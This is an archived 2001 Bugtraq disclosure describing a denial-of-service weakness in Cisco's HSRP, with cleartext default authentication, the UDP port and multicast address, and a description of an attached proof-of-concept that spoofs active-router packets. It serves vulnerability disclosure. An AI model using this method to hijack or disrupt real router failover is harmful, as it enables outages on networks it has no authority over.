Bugtraq mailing list archives
Cisco HSRP Weakness/DoS
From: bashis <bash () NS WCD SE>
Date: Thu, 3 May 2001 19:57:41 +0200
Hi I was playing with Cisco's HSRP (Hot Standby Routing Protocol), and there is a (major) weakness in that protocol that allow any host in a LAN segment to make a HSRP DoS. Short (very) explain of HSRP. HSRP uses UDP on port 1985 to multicast address 224.0.0.2, and the authentication is in clear text. (default: cisco) I include a small program that sends out a fake HSRP packet, when it hear a legal HSRP packet, as a "proof of concept" code... Vendor was notified about this 14 April 2001,, and their response was to use HSRP with IPSec. http://www.cisco.com/networkers/nw00/pres/2402.pdf [cut from src] /* * Description: * This code listen for any HSRP packet, when it hear one HSRP packet, * it capture this, modifies some of HSRP protocol parameters, and send out * a fake HSRP packet that tells other routers that I am the active router, * I have highest priority and you should be 'Standby' or silent.. * * If the other active, and legal router has highest possible * priority (255), then they will fight.. ;-) , AND it seems * in my tests that the legal router who 'wishes' be active router, * IS allready active, so no DoS will occure. (only UDP flood from both) */ -- \0x62\0x61\0x73\0x68\0x69\0x73
Attachment:
hsrp-dos.tgz
Description: gzip compressed data, deflated, last modified: Thu May 3 20:02:56 2001, os: Unix
Current thread:
- Cisco HSRP Weakness/DoS bashis (May 03)
- <Possible follow-ups>
- Re: Cisco HSRP Weakness/DoS Steven M. Bellovin (May 03)
- Re: Cisco HSRP Weakness/DoS bashis (May 05)
- Re: Cisco HSRP Weakness/DoS Damir Rajnovic (May 16)